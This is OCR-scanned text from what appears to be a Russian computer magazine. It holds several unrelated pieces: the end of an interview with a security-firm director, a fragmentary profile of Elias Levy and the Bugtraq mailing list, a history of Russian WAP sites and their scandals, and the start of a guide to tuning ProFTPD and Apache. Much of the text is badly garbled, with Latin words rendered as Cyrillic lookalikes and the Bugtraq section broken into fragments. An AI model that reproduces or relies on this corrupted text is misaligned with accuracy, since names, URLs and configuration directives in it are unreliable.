ность — очень прибыльный бизнес и не требует больших изначаль- 
ных затрат. Не нужно закупать сырье, арендовать склады, магази- 
ны, платить фиксированную зарплату продавцам. И в то же время 
услуги по созданию и поддержке сайтов, раскрутке, обслуживанию 
компьютерной техники, написанию мелкого и крупного ПО, защите 
сайтов и информации востребованы практически любой компани- 
ей в России. 

Тебе, наверное, интересно, как проходит обычный день директора 
зесигііу-фирмы? С утра я трачу около получаса на планерку: обща- 
юсь с сотрудниками по горячим делам, обсуждаю все вопросы по 
работе, потом отвечаю на все электронные письма, далее встреча- 
юсь с клиентами, принимаю непосредственное участие в проектах, 
общаюсь в интернете по деловым вопросам. Во второй половине 
дня работаю с персоналом, планирую новые направления работы, 
строю линии развития бизнеса. Внутри компании действуют чет- 
кие фирменные стандарты, которые оговаривают правила рабо- 
ты и взаимоотношений среди сотрудников. Общение практически 
всегда проходит на теплом дружественном уровне, но что касается 
работы — тут все строго. Дружеские отношения не позволяют на- 
рушать, скажем, временные рамки или действовать в ущерб про- 
екту. Большинство встреч с клиентами проходит на современном 
деловом уровне: в костюмах, с визитками, ноутбуками и прочими 
атрибутами бизнес-стиля солидной компании. 

Я считаю, что залог успеха частной зесигііу-фирмы заключается в 
высоком уровне ответственности и профессионализме работы. А 
добиться этого можно только, если имеешь отличный уровень под- 
готовки и знаний, желание работать и побеждать у каждого сотруд- 
ника компании. =Н= 
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гостем встреч клуба «2600», а несколько месяцев спустя 
ЬидГд Т0ЯННЫМ П ° ДПИСЧИК0М ^игііу-рассылок, включая 

О Известные хобби 

Чтение, рисование (учился е художественной школе 3 года! 
:=Г нес,с„„.р ы „, а , т „ и> „ йм) , Иокусс Г: 

О Проекты 

іі Я ненавижу войн ы привержйнц ов пяп ,,. гг 



5 ноябр 1993 года Скотт Чейзи ^ недовольный публика _ 

Ц ей инфы об уязвимостях, спустя лишь несколько недель 
после обнаружения решил создать собственный ресурс 
оторыи быстро реагировал бы на все прорехи в безопас ’ 

мамию" 1 г” Д ° ЧИТаТѲЛѲЙ макси мально полную инфор- 
мацию. Так появился Ьидігад - почтовая рассылка для 
дминистраторов, компьютерных специалистов и просто 

а ст^о И со еРеСУЮЩИХСЯ "* ЗѲСиГІ(У - ВТ0Р0Й ~ багтра 
а стало совместное создание патчей и заплаток к разным 

программам, поскольку в это время софтварные разработ 

чики не утруждали себя повышением безопасности своих 

орении. Через два года Скотт решил оставить рассылку 

передал ее в руки АІерб 1 - одного из самых давних и ува 

жаемых подписчиков. Закороткое время Элиас удалил весь 

Флуд и превратил багтрак в самый популярный (40 тысяч 

подписчиков) и авторитетный зесигі.у мейл лист остава 

ясь е Г0 бессменным модератором на протяжении '~ 

Ьийгаа Та^ ВЫ ° ШИѲ ЧИНЫ подняли вопрос о законности 
Ьидігад, намереваясь его прикрыть, АІерМ заверил всех 

что багтрак не перестанет выходить несмотря ни на что и ' ] 

если потребуется, переберется за пределы США. Все это 

га» известных фигур в мире К0М - 

ним из самых хитовых за всю историю е-мага, вь^зваТмассу 
споров и дискуссий. Впервые уязвимость ЬиЯег оѵегіі™ и 

робно и в 3063 ™® В0 ВЗЛ0МаХ бЫЛИ расом . от Рены столь под- 
робно^ впервые эта информация стала доступной всем 

опертамиТм 60 " ° НѲСК °“ компьютерными эк- 
Зеси ІМосн? Р ' ^ ” И3 ° СН0Ва ™ компании 

терне Гн ' К ° Т ° Р ° Й ВСК ° Ре СТЭЛ к РМшим в ин- 

пасности я ИНФ0РМЭЦИИ по компьютерной безо- 

асности. Элиас занял должность технического директо- 



О Заслуги 

Элиас Леви не получал официальных 



наград за свои тру- 



Дьі, но в 2000 году авторитетный компьютерный портал 
.«с со „„ я список 9 , 0.™"*: 

ажных для сети людей десятилетия, ос 
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Х а татес Н и Ю Л 2002 ^ " РИ ° бретена корпорацией 
утап(ес, и Леви переехал в новый офис. 

Также АІерМ был администратором очень популярного 

Гтам Ха мо еРОВ б 1998 " 2001 ™ ДаХ ^ЬШ^ещшшІ 
м можно было найти описание уязвимостей, эксплои- 

различные тексты и утилиты. Но со временем, когда сайт 

разросся, его сталд трудно поддерживать, и автор посте- 

с :о; з ^: силпроектВ2001гояувин - 

портал, умер, а с ним ушел в небытие и весь архив инфы 
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ИСТОРИЯ СТАНОВЛЕНИЯ РУССКОЯЗЫЧНОГО ШАРА 



ПРИВЕТ, КОМРАД ! КАК ЧАСТО ТЫ ЗАХОДИШЬ НА ѴѴАР-САЙТЫ СО СВОЕГО МОБИЛЬНОГО ТЕЛЕФОНА? НАВЕРНЯКА ПАРУ- 
ТРОЙКУ РАЗ В ДЕНЬ: ПРОВЕРИТЬ ПОЧТУ, СКАЧАТЬ СВЕЖИЕ МЕЛОДИИ И ИГРУШКИ, ДА МАЛО ЛИ ЕЩЕ ЗАЧЕМ? А ЗАДУМЫ- 
ВАЛСЯ ЛИ ТЫ, ОТКУДА ВООБЩЕ ПРОИЗОШЕЛ ВАП, С ЧЕГО ВСЕ НАЧИНАЛОСЬ? ЕСЛИ ТЕБЕ ИНТЕРЕСНО ОБ ЭТОМ УЗНАТЬ, 
ЧИТАЙ ДАЛЬШЕ. 



ѳрвое упоминание о ѴѴАР датирует- 
ся июнем 1997 года, когда три ли- 

I I дера мобильного мира — Егісззоп, 

Моіогоіа и ІМокіа, — а также фирма ЫпѵѵігесІ 
РІапеі разработали концепцию объединения 
интернета и мобильной связи. Несколько 
месяцев спустя, в январе 1998, они основали 
некоммерческую организацию ѴѴАР Рогит 
(\А/\А/\А/■ѵѵарIо^^пп■о^а , ) ■ занимающуюся про- 
движением этой идеи. Принята она была, 
надо сказать, на ура, и в течение следующего 
полугодия участниками проекта стало боль- 
шинство крупных поставщиков сотовой связи 
и МТ (на данный момент в консорциум входит 
более 500 организаций). В мае 1 998 года была 
опубликована первая редакция ѴѴАР — ѵ.1 .0, 
— в которой было множество ошибок и неточ- 
ностей. На их исправление ушел год, и в июне 
1999 Форум представил вторую версию про- 
токола — ѴѴАР ѵ.1 .1 . Последняя версия ѵ.2.0 
появилась в январе 2002 года, а организация 
ѴѴАР Рогит вскоре стала частью Ореп МоЬіІе 
АІІіапсе (ОМА). 

/ по 



О Зарождение РуВапа 

1999-2001 год. В то время как за рубежом 
плодились и размножались разнообразные 
буржуйские ѴѴАР-сайты, создаваемые как 
крупными интернет-компаниями, так и люби- 
телями-одиночками, российские операторы 
сотовой связи только начинали внедрять ус- 
лугу С5Э для доступа в ѴѴАР. Люди, заставшие 
то время, помнят, что до заявленной опсоса- 
ми скорости 9,6 Кбит/сек было еще далеко. 
Но тем не менее российские поисковики, 
почтовики и прочие сервисы стали активно от- 
крывать свои представительства в ѴѴАР'е. Это 
были (и есть) ѵѵар.таіі.ги . ѵѵар.арогРги . ѵѵар. 
ѵа.ги. уѵар.гатЫег.ги и т.д. С помощью этих 
сайтов стало возможным зайти с мобильника 
в свой почтовый ящик, почитать свежие ново- 
сти, узнать курсы валют и котировки акций. 
Это, конечно, было здорово, но пользоваться 
такими сайтами могли лишь деловые люди 
с хорошим достатком, так как в те далекие 
времена трубки с поддержкой ѴѴАР 1.1 стои- 
ли очень дорого. Не оставались в стороне и 




сайты мобильных операторов: ѵѵар.ЬееІіпе.ги. 
ѵѵар.тіз.ги. ѵѵар.пѵѵдзт.ги . . . Именносихпомо- 
щью начали раскручиваться первые мобиль- 
ные порталы, такие как ѵѵар.ааІа.пеГ 



>Так выглядело общение в Г ала-чате 

5 17:29 Г яавная 

ІШ-ІЕТТЕ: Зарасти всей 0) 
(17:21) 

СЙМНР: В 2Ш СѴКН ѴОВЫНІ 
81Ж НУ 4В0 РѴСКМ 20ЙѴ04МС 
ЙХЙХАХАХЙХЙХЙХЙХЙХЙХАХЙХЙХЙ 
ХШХЙХШХЙХЙХШ (17:20) 
СеіпеІ: 0! ясно пойду ка я 
(1719) 

РгеатЬаЬѵ: Глухо как в 

танке гг (1717) 
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РУВАП: КАК ЭУСГБЫЛО 



Тот самый Муріік 



О Мобильные сообщества 

С 2001 по 2003 мобильные операторы внед- 
ряют тестовую и пока еще бесплатную услу- 
гу ОРРЗ. Естественно, качество пакетной 
передачи данных первое время оставляло 
желать лучшего, но все же скорость была го- 
раздо выше, чем у СЗЭ. В это же время стали 
появляться доступные мобильные телефоны 
с поддержкой ѴѴАР и ОРРЗ (Зіетепз МЕ45, 
ЗІ_45, ЗІ_45і, М50). Благодаря появлению этих 
мобильников, а также ссылкам на ѴѴАР-пор- 
талах Билайна, МТС и Мегафона, начал рас- 
кручиваться один из первых мобильных чатов 
— ѵѵарсііаі.ааіа.пеі. Я до сих пор вспоминаю 
бессонные ночи с сименсом в руках, прове- 
денные в этом замечательном месте. Уже в 
2003 году в галанетовском чате одновремен- 
но находились до 1000 пользователей он- 
лайн: такая цифра непосильна даже сейчас 
многим современным интернет-порталам. 
Стоит упомянуть еще об одном сообществе- 
форуме на ѵѵар.рзііпк.ги . который был осно- 
ван летом 2003 года на базе движка рЬрВВ. 
Именно из-за него я забросил чат на ааіа.пеі. . 
У этого форума были все основные функции 
большого собрата, десятки активных тем и 
сообщений. Г лавной фишкой этой мобильной 
конференции была возможность создания 
своих личных подфорумов. Для этого надо 
было набрать определенный лимит постов и 
убедить админа в соответствующей теме в по- 
лезности нового форума. Основные разделы 
были неинтересными, а вот о личных фору- 
мах пользователей стоит рассказать подроб- 
нее. Именно из них вышли админы наиболее 
известных нынче вап-сайтов. Самым посеща- 
емым и популярным разделом был форум с не- 
хитрым названием «зЬепгі» (более 10-ти тысяч 
сообщений. Сейчас его автор ЗНет вместе со 
мной и Нео является админом портала ѴѴаРР. 



ш), за ним шли форум кісігоск (сегодня — ад- 
мин зесІиЬ.ога ) и ааііі (даііі.ги) . Каждый завле- 
кал посетителей по-своему: Шем, к примеру, 
писал каждому онлайн-пользователю в при- 
ват приглашение зайти в его раздел :). Все 
шло хорошо: люди знакомились, общались, 
встречались. Через год я написал собствен- 
ную ѵѵар-модификацию для рНрВВ, и мы стали 
ее продавать всем желающим. С тех пор фо- 
рум рзііпк стал уже не таким экслюзивным, и 
его популярность стала угасать. Сейчас он 
находится на ѵѵаріогит.ги . но уже полгода 
или больше не работает. 

О Первые энтузиасты 

2003 год ознаменовался появлением 
буржуйского конструктора сайтов 
туѵѵар.о2.со.ик . довольно примитивного, но 
альтернативы на тот момент не было. Тут же 
появились желающие создать свою стра- 
ничку в вапе. Их (и мои, признаюсь, тоже) 
творения были ужасными, так как кириллицу 
данный сервис не поддерживал. Примеры ты 
можешь посмотреть на зНет.туѵѵар.о2.со. 
ик (первый сайт ЗЬеітГа) и ЬезргесІеІ.ааІа.пеі. 
тѵѵѵар.о2.со.ик (фанатский сайт чата на ааіа. 
пеі}- Только смотреть советую не с компа че- 
рез Оперу, а с черно-белого мобильного те- 
лефона — так ты лучше поймешь атмосферу 
того времени. Сотни вап-мастеров сооруди- 
ли свои паги на конструкторе майвапа. Это 
было очень трудоемкое занятие, так как все 
тексты и ссылки приходилось набирать с 
телефона, оформление было стандартным 
(сайты отличались по внешнему виду лишь 
картинкой на главной странице), неразбор- 
чивый транслит, вечные тормоза из-за пере- 
груженности сервиса и т.д. Но все измени- 
лось с появлением чешского конструктора 
ѴѴАР-сайтов ѵѵіізі.зк (или ѵѵіізі.сг). 

Первым о нем сообщил ЗІаѵік (автор зирег. 
ѵѵіізі.зк) на форуме рзііпк. Реакции наших вап- 
перов не пришлось долго ждать: основная 
масса сайтов быстро перебралась с тѵѵѵар. 
о2.со.ик на серверы братьев-славян. Пона- 
чалу конструктор был бесплатным и имел 
гораздо больше возможностей по сравне- 
нию с предшественником. ЗІаѵік даже на- 
шел способ писать по-русски через ипісобе, 
символами типа &1 072#. Впервые поддержка 
кириллицы появилась только через год, вмес- 
те с введением оплаты за предоставляемые 
услуги. Еще одной замечатель- 
ной особенностью ѵѵіізі.зк была 
возможность вставки счетчиков 
рейтингов (в то время работали 
рейтинги оигѵѵар.ги. Ыіпсіагіп.ги и 
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до сих пор действу- 
ющий ѵѵар.рзііпк.ги) . 
с помощью которых 

раскручивались вап-сайты. Они активно рек- 
ламировались в чатах, особенно на ааіа.пеі . в 
гостевых книгах других сайтов и на форумах. 
Это привлекало до 500 пользователей в день. 
Затем появляется поддержка ѵѵті-страниц на 
знаменитом бесплатном хостинге пт.ги и вап- 
мастера, у которых имелся компьютер, быст- 
ро осознали всю прелесть создания сайтов на 
большом экране и полноценной клавиатуре. 
Мобильные конструкторы были заброшены, 
а на смену им пришли такие популярнейшие 
сайты, как ѵааап666.пт.ги . тапз.пт.ги и сІІ22ѵ. 
пт.ги (создатели этих проектов теперь адми- 
нистрируют портал ѵѵар. ѵѵаЬ.ги ). ІіЬеіІуѵѵар. 
пт.ги (прообраз Іѵѵар.ги . теперешнего ѵѵарр. 
ги). В 2003 году появился и первый русский 
конструктор ѵѵар.ѵѵарзегѵіз.ги . но особой по- 
пулярности он не имел из-за ограниченных 
возможностей. 

Прошло полгода. Администраторы хостин- 
га пт.ги перекрыли доступ к своим сайтам 
абонентам БиЛайн, в результате этого посе- 
щаемость многих вап-сайтов значительно 
уменьшилась. Ведь людей, сидящих в вапе, 
в то время было абсолютное большинство. 
Думаю, именно этот факт послужил причиной 
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увеличения числа регистраций вап-сайтов в 
доменах второго уровня (.ш, .сот, .пеі). Ес- 
тественно, появлялись и другие бесплат- 
ные сервисы, поддерживающие вап, но они 
быстро умирали. Например, тот же пагосі. 
Ш поддерживал ѵѵті-странички, хотя на этот 
«народный» мобильный сайт можно было 
зайти только по ссылке вида ІтДр://зі1е.пагосІ. 
ги/іпбех.ѵѵті . где іпбех.ѵѵті не прописывался 
как главная страница. 

□ Вап-скандалы 

Очень важно упомянуть о еще одном зарубеж- 
ном билдере: ІтДрУАааІаа.сот. В нем можно 
делать вап-сайты прямо с компьютера, эмуля- 
тор вап прилагается . Именное этого конструк- 
тора начинается история популярнейшего в 
то время сайта ѵѵар.тѵрик.ги. админ которо- 
го свои первые опыты с вапом проводил по 
адресу: НДр:/Лаа1аа.сот/тѵрик. Когда ѵѵар. 
тѵрик.ги стал падать в рейтингах, Александр 
Мурадов (Мурик) предложил сотрудничество 
Мансу и ЭІ 22 у (адреса их бывших сайтов я уже 
упоминал). Ребята сделали Мурику нормаль- 
ный чат, динамические загрузки, даже пла- 
нировали открыть свой вап-конструктор. Но 
через пару месяцев появились первые парт- 
нерские программы, и Мурик в одиночку стал 



Ц Редактор 
навнение^центр 

Редактировать 

********* 

Текст: 



ІМ: 



ВОД/ 



Картина 



Сек^ят, 

Быть мояет, здесь ты 
найдешь сбою любовь? =) 
[_ап диаде; 

> Русский 

> ЕпдВФ 

© ШРР.Яи 



Размер: 

> Конструктор ѵѵар-сайтов 



зарабатывать на этом большие деньги. Мане 
и Диззи продолжали работать бесплатно, а 
Мурик их обманывал, говоря, что партнерс- 
кие ссылки — это просто услуга «дружест- 
венным сайтам знакомых». Конечно, обман 
раскрылся, ребята ушли и в августе 2004 
года основали один из самых посещаемых 
на сегодня вап-проектов ѵѵар.ѵѵаЬ.ги. Ваб.ру 
получил хорошую раскрутку благодаря ка- 
чественному вап-конструктору, а мурик. ру, 
из-за непомерной жадности и лени своего 
админа, стал постепенно терять постоянных 
клиентов. 

В это время в мире вапа происходят и другие 
интересные вещи. В конце 2003 года извес- 
тный веб-сайт ѵѵѵѵѵѵ.зіетепз-сІиЬ.ги откры- 
вает свое представительство в ѴѴАР — ѵѵар. 
зіетепз-сІиЬ.ги . Сайт постепенно набирает 
обороты, но не поднимается в рейтингах 
выше средних мест. Зимой 2004 года сотовый 
оператор БиЛайн вводит оплату за ѲРВ5- 
трафик вместо абонентской платы в 3 дол- 
лара ежемесячно. Конечно, недовольство 
миллионов абонентов «пчелайна» не знало 
границ. Умные люди из сименс-клуба реши- 
ли навариться на этом и организовали акцию 
протеста против повышения стоимости тари- 
фов. Вся «важная» информация о предсто- 
ящем митинге была размещена на их сайте, 
и авторы призвали админов других проектов 
разместить на нее ссылки. Так как о прода- 
же мобильного контента 
тогда мало кто еще знал, 
десятки самых популяр- 
ных вап-сайтов дали на 
своих главных страни- 
цах линки на сименс- 
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клуб. Мурик даже временно заменил индекс- 
ную пагу на полную информацию о митинге с 
призывом пройти по ссылке и поучаствовать 
в акции. Как ты думаешь, какой сайт после 
месяца бесплатной рекламы стал самым по- 
пулярным во всех рейтингах? :) Акция протес- 
та, кстати, успеха не принесла: в ней приняли 
участие, если не ошибаюсь, всего около 200 
человек. Представитель БиЛайна тактично и 
решительно парировал все аргументы про- 
тестовавших людей. 

О Все меняется, 
когда приходят они... 

Деньги... В 2004 году на вап-рынок вышли 
первые мобильные партнерские программы 
по продаже мобильного контента (в то время 
это были только іаѵа-игрушки — другие виды 
платных вап-развлечений появились позже). 
Сначала они не имели успеха, но с появлени- 
ем у людей нормальных телефонов, подде- 
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рживающих]аѵа, постепенно 
стали завоевывать вап-ры- 
нок. Первой компанией, за- 
пустившей вап-партнерки, была ЛКС со сво- 
ими проектами тесІіатоЫІе.ги и р іаѵіоп.ги . На 
крупнейших сайтах в обязательном порядке 
стали появляться ссылки с названиями: «Хиты 
осени 2004!», «Заѵа-игры! Халява» и прочее. 
Одновременно с этим намного увеличилось 
число регистраций доменных имен, имеющих 
в своем названии слово «ѵѵар». Например, мы 
зарегали ѵѵарр.ги 29 декабря 2004 года и по 
сей день успешно с ним работаем. В 2005 ко- 
личество партнерских программ еще больше 
увеличилось, наиболее примечательными из 
них были ттзка.ги и ѵѵар.ѵѵаріх.ги . Медиамо- 
байл с плейфоном намного от них отстали по 
части качества партнерских сайтов и коли- 



чества продаж единиц контента. 

В результате притока денег число вап-сай- 
тов резко выросло, появилась жестокая кон- 
куренция — никто никому не нужен, каждый 
сам за себя. Естественно, в результате этого 
появился очень прибыльный сегодня рынок 
вап-рекламы. То есть сайты с хорошей посе- 
щаемостью продают ссылки насвоих главных 
страницах другим сайтам. Причем если в 2005 
году цены начинались от 300 рублей в день, то 
сегодня они составляютуже до 6500 условных 
единиц в месяц. Рост прибыли 
от продаж мобильного контен- 
та тому немало способствовал. 
Качество вапа также намного 
выросло. Появились бесплат- 
ные сервисы, удобные вап- 
конструкторы (ИНр://ЬиіІсІег.рогТги) . разделы 
с загрузками мпЗ-песен покруче любого веб 
мпЗ-портала (ІпНр://ѵѵарр.ги/сІоѵѵпІоасІ5/трЗТ 
В общем, с приходом денег пришла цивилиза- 
ция :). В одном из летних номеров ][ в РС_20МЕ 
ищи подробную статью про заработок в вап, а 
пока учи матчасть: языки разметки вап-стра- 
ницѵѵті ихНітІ. 

О Год 2006. Что дальше? 

Сегодня на ѴѴАР-сайты заходят миллионы 
людей в день, в них вкладывается огромное 
количество денег, проводятся ежемесячные 
рекламные аукционы на крупных сайтах, в 
вап приходят работать лучшие программисты 



и дизайнеры (с появлением ѴѴар 2.0 в России 
дизайн мобильного сайта стал по-настояще- 
му актуальным), в мобильныхчатахи сервисах 
знакомств зарождается новая любовь и раз- 
биваются чьи-то сердца. Люди находят дру- 
зей и ссорятся... А что будет дальше? Думаю, 
уже через год все мобильные сайты будут 
цветными и адаптированными под мобильные 
телефоны с большим разрешением экрана. 
Появятся новые виды сервисов и мобильных 
услуг, администраторы ѴѴАР-сайтов станут 
зарабатывать еще больше, популярные сай- 
ты станут еще популярнее, само собой, поя- 
вятся новые порталы с огромным трафиком. В 
общем, те, кто говорил, что вап — это мертво- 
рожденный ребенок, глубоко ошибались. =н= 
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ИНр://орептоЬіІеаІІіапсе.огдЛесІп/а^Ііа^ез/ 
ѵѵар/ѵѵаріпсіех.іііті — специфйішции 
релизов всех версий ѴѴАР. % 

И11р://\А/аррти — пример одного из популяр- 
нейших ѴѴАР-сайтов ■. 0 : 

- б11р://хН1тІ.гіІ*/ — для тех, кто решил строить 
ѴѴАР 2.0 сайт 

И%р://сотри1егЬоокз.ги/сІоѵѵпІоасІ/ѵѵтІ/ - , 
ѵѵтІЬоокІ .гаг — классный учебник ѴѴМІ_ 
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РУКОВОДСТВО ПО ОПТИМИЗАЦИИ РАБОТЫ СЕТЕВЫХ СЕРВИСОВ 

СЕГОДНЯ МЫ ПОГОВОРИМ ОБ ОПТИМИЗАЦИИ РАБОТЫ РАЗЛИЧНЫХ СЕТЕВЫХ ПРОГРАММ. ПРАКТИЧЕСКИ КАЖДЫЙ СЕТЕВОЙ 
СЕРВИС ИМЕЕТ СВОИ ДИРЕКТИВЫ УПРАВЛЕНИЯ ПРОИЗВОДИТЕЛЬНОСТЬЮ. ЗНАЧЕНИЯ ПО УМОЛЧАНИЮ РАССЧИТАНЫ НА 
ВСЕХ: И НА ДОМАШНИЙ КОМПЬЮТЕР, НА КОТОРОМ ТОТ ИЛИ ИНОЙ СЕРВИС ИСПОЛЬЗУЕТСЯ ТОЛЬКО ДЛЯ ЭКСПЕРИМЕНТА, 

И НА СЕРВЕР БОЛЬШОГО ПРЕДПРИЯТИЯ, ДОСТУП К КОТОРОМУ ПОЛУЧАЮТ СОТНИ ПОЛЬЗОВАТЕЛЕЙ ОДНОВРЕМЕННО. 
СОВЕРШЕННО ОЧЕВИДНО, ЧТО ДАННЫЕ ЗНАЧЕНИЯ НЕ МОГУТ БЫТЬ ОПТИМАЛЬНЫМИ ИМЕННО ДЛЯ ТВОЕГО СЛУЧАЯ. В ЭТОЙ 
СТАТЬЕ МЫ ПОГОВОРИМ, КАК ВЫЖАТЬ МАКСИМУМ ПРОИЗВОДИТЕЛЬНОСТИ ИЗ АРАСНЕ, РРОЕТРЭ, ЗАМВА И ОРЕЫЗЗН. 



I з всех доступных реализаций РТР- 
серверов я остановил свой выбор 
I I на РгоРТРЭ. Если ты отдаешь пред- 

почтение \л/и-ТірсІ, риге-ЙрсІ или ѵзТІрсІ , то не 
волнуйся: их настройка будет аналогична. От- 
крываем файл конфигурации, в данном слу- 
чае /еіс/ргоЙрсІ.сопГ Первое, что бросается в 
глаза, — этодирективаЗегѵегТуре.Онаможет 
принимать значения зіапбаіопе или іпеІ<± По 
умолчанию используется первое значение, 
означающее, что сервер будет работать ав- 
тономно, а не через хіпеісі. Если по какой-то 
причине в твоем конфиге установлено зна- 
чение іпеісі, то без промедления замени его 
на зіапсіаіопе. В автономном режиме произ- 
водительность РТР-сервера заметно выше, 
поскольку он постоянно загружен в память 



и ожидает подключения. В режиме іпеШ РТР- 
сервер вызывается суперсервером хіпеісі по 
мере поступления запроса. Ясно, что во вто- 
ром случае для обработки запроса требуется 
больше времени. 

Не кажется ли тебе, что авторизация на 
сервере занимает слишком много време- 
ни? Этот процесс можно существенно ус- 
корить, отключив директивы ІбепЮоокир и 
ІІзеВеѵегзеЭМЗ: 

ІсІепЩоокирз 
ІІзеНеѵегзеОМЗ оІ 

Первая директива подразумевает использо- 
вание протокола ібепі для идентификации 
клиента. Поскольку данный протокол все рав- 



но уже не используется, ІбепЮоокирз можно 
выключить с чистой совестью. 

Вторая директива позволяет определять до- 
менные имена подключившихся клиентов по 
их ІР-адресам. Поскольку разрешение имен 
занимает время, то лучше его отключить — так 
авторизация на сервере будет проходить на- 
много быстрее. 

С этим разобрались, идем дальше: 

• МахС1іеп1:2 число[сооЕщение] — задает 
максимальное число одновременно рабо- 
тающих клиентов. Сколько клиентов может 
одновременно выдержать твой сервер, 
зависит не только от самого сервера, но и 
от пропускной способности канала. Чем 
«шире» канал, тем с большим числом клиен- 
тов может справиться сервер. 
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> Разница между синей и красной линиями гово- > Производительность ЗЗН и НРІМ-ЗЗН 

рит о потраченном впустую потенциале пропуск- 
ной способности 



• МахС1іеп*гРеі-Ног* число[сооБщение] — мак- 
симальное число клиентов от одного узла. 
Если ограничение будет превышено, то 
пользователь увидит сообщение, заданное 
необязательным параметром [сообщение]. 
Значение зависит от каждого конкретного 
случая. Рекомендую разрешить доступ трем 
клиентам от одного узла. 

• МахС1іеп*гРегІ_І5ег число[сооБщение] — мак- 
симальное число клиентов от одного пользо- 
вателя. Можно указать значение «1». 
•МахСоппес^іопР-э-і:? — позволяет указать 
количество соединений в секунду. Данный 
параметр сильно зависит от ширины канала, 
поэтому конкретное значение порекомендо- 
вать не могу. Если установить « 1 » , то за одну 
секунду с сервером можно будет установить 
только одно соединение. 

• МахНог^гРегІігег число[сооБщение] — мак- 
симальное количество узлов на одного поль- 
зователя. Предположим, что Вася Пупкин 
хочет нас обхитрить. Он раздал свой пароль 
всем своим знакомым, и теперь они будут 
пытаться зайти под логином Васи с разных 
компьютеров. Мы этого сделать не позволим, 
поскольку установим значение «1 » для этого 
параметра. 

• М-эхІпБ^апсег число — максимальное чис- 
ло одновременно запускаемых процессов 
в режиме зіапсіаіопе. Во избежание прове- 
дения успешной ЭоЗ-атаки, рекомендую 
уделить должное внимание выбору значе- 
ния для этого параметра (опять-таки за- 
висит от ширины канала и возможностей 
сервера). В своем конфиге я установил 
«Махіпзіапсез 30». 

• МахІ_одіпА**етр*5 число — сколько раз 
пользователь может ввести пароль. После 
последней попытки сервер разорветсоеди- 
нение. Рекомендуемое значение — «3». 

• МахРе^гіеѵеГіІеЗіге — максимальный раз- 
мер получаемого файла. Можно не устанав- 
ливать, потому как файлы, загружаемые то- 
бой на сервер, будешь контролировать ты 
сам, а файлы, которые загружают пользо- 
ватели, определяются с помощью директи- 
вы МахЗіогеРіІеЗіге. Если никто не «зальет» 
на сервер файл размером, скажем, в 1 Гб, 



следовательно, никто не сможет и скачать 
этот файл. 

• Мах5*огеРі1е5іге — максимальный размер 
файла, загружаемого на сервер пользова- 
телями. Тут все зависит от «ширины» кана- 
ла и места на диске. На твое усмотрение. 
Если у сервера «узкий» канал, то можно 
попробовать несколько улучшить ситуацию 
с помощью следующих директив: 

• Б-айт-в-секунду — задаетмак- 
симальную скорость чтения информации с 
серверав ВРЗ (область действия — сервер, 
ѴігІиаІНозІ, ѲІоЬаІ, Апопутоиз, Эігесіогу). 

• Ка*еКеаі1РгееВу*е5 Байт — указанное ко- 
личество байтов учитываться не будет 
(область действия — сервер, ѴігіиаІНозі, 
ѲІоЬаІ, Апопутоиз, Эігесіогу). 

• Ка^еКеагіНаггіВРЗ оГГ | оп — определяет, 
ждать ли ему после исчерпания первых 
бесплатных байт, пока средняя скорость не 
опустится до РаіеРеасІВРЗ, или нет. 

• Ка*еУгН:еВР5 Байт-в-еекунду — скорость 
записи информации на сервер в ВРЗ (об- 
ласть действия — сервер, ѴігіиаІНозі, 
ѲІоЬаІ, Апопутоиз, Эігесіогу). 

• Ра*еУгі*еРгееВу*ег Байт — то же, что и 
ЯаіеЯеасІРгееВуіез, но для записи. 

• Ка*еУгі*еНаггіВРЗ оГГ | оп — то же, что и 
ЯаіеЯеасІНагсІВРЗ, но для записи. 

• ТгапгРегРа^е — заменяет старые директи- 
вы Яаіе* и позволяет задать максимальную 
скорость передачи данных (чтения/записи). 
Использовать директивы Яаіе* иногда даже 
предпочтительнее, поскольку можно ука- 
зать отдельно скорость чтения и скорость 
записи, что бывает полезно, если сервер 
подключен по асинхронному каналу. 

Также немного времени можно выиграть, 
если из строки формата протокола удалить 
модификатор «%Ь» (строка протоколиро- 
вания задается директивой І_одРогтаі). Это 
имя узла клиента, но, как мы знаем, для раз- 
решения имени нужно сделать ЭИЗ-запрос, 
а на это требуется время. 

Правильно установив вышеуказанные 
параметры, можно добиться существен- 
ного прироста в производительности 
РТР-сервера. 



О Индеец на стероидах 

Как и у сервера РгоРТРЭ, у АрасМе есть ди- 
ректива МахСІіепіз, определяющая макси- 
мальное количество клиентов, которые мо- 
гут одновременно работать с сервером. Это 
не просто число клиентов, это еще и число 
Апачей, одновременно запущенных на твоем 
сервере (то есть каждому соединению соот- 
ветствует своя копия Апача). Представь, что 
ты установил значение «30», а зайти на твой 
сайт одновременно пытаются, скажем, сразу 
35 пользователей. Выходит, 5 пользователей 
окажется «за бортом». С другой стороны, 
если ты установишь значение с большим за- 
пасом, скажем, «150» или даже «200», а на 
твой сайт одновременно заходят только 5-10 
человек, то это будет непростительным рас- 
точительством системных ресурсов. Зачем 
тебе 190 индейцев-бездельников? Они толь- 
ко съедят драгоценные системные ресурсы 
(процессорное время, оперативную память). 
Поэтому нужно определить максимальное 
число пользователей, которое когда-либо на- 
ходилось на сервере одновременно. Это мож- 
но сделать с помощью программы ѴѴеЬАІігег 
или любого форума, например РНРВВ. 

Но, кроме МахСІіепІз, есть еще и другие ди- 
рективы управления производительностью. 
Например, ЗіагіЗегѵегз, МахЗрагеЗегѵегз, 
МіпЗрагеЗегѵегз. Как уже отмечалось выше, 
для каждого нового соединения создается 
новая копия процесса сервера. Директива 
ЗіагіЗегѵегз задает такое количество копий, 
которое будет создано при запуске исход- 
ной копии сервера. При этом исходная копия 
сервера получает запросы и передает их сво- 
бодным копиям. Это позволяет равномерно 
распределить нагрузку между отдельными 
процессами и повысить производительность 
сервера. Однако на практике все не так хоро- 
шо, как хотелось бы. Существенного прирос- 
та производительности можно добиться толь- 
ко в случае большой загрузки сервера. По 
умолчанию запускается пять копий сервера. 
Если число поступающих запросов превыша- 
ет количество запущенных копий сервера, то 
запускаются дополнительные процессы-сер- 
веры. Эти процессы не завершаются после 
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обработки своего запроса, а продолжают 
висеть в памяти. Директива МахЗрагеЗегѵегз 
позволяет указать максимальное число таких 
процессов. Если это количество превышено, 
то лишние процессы завершаются. Если ко- 
личество «серверов на подхвате» меньше, 
чем задано директивой МіпЗрагеЗегѵегз, то 
запускаются дополнительные копии. Для ра- 
боты этих директив необходимо, чтобы сер- 
вер был запущен в автономном режиме. 
Директива Тітеоиі задает промежуток вре- 
мени в секундах, в течение которого сервер 
продолжает попытки возобновления приос- 
тановленной передачи данных. Значение ди- 
рективы ТітеоіЛ распространяется не толь- 
ко на передачу, но и на прием данных. Если 
требуется передавать большие файлы, то 
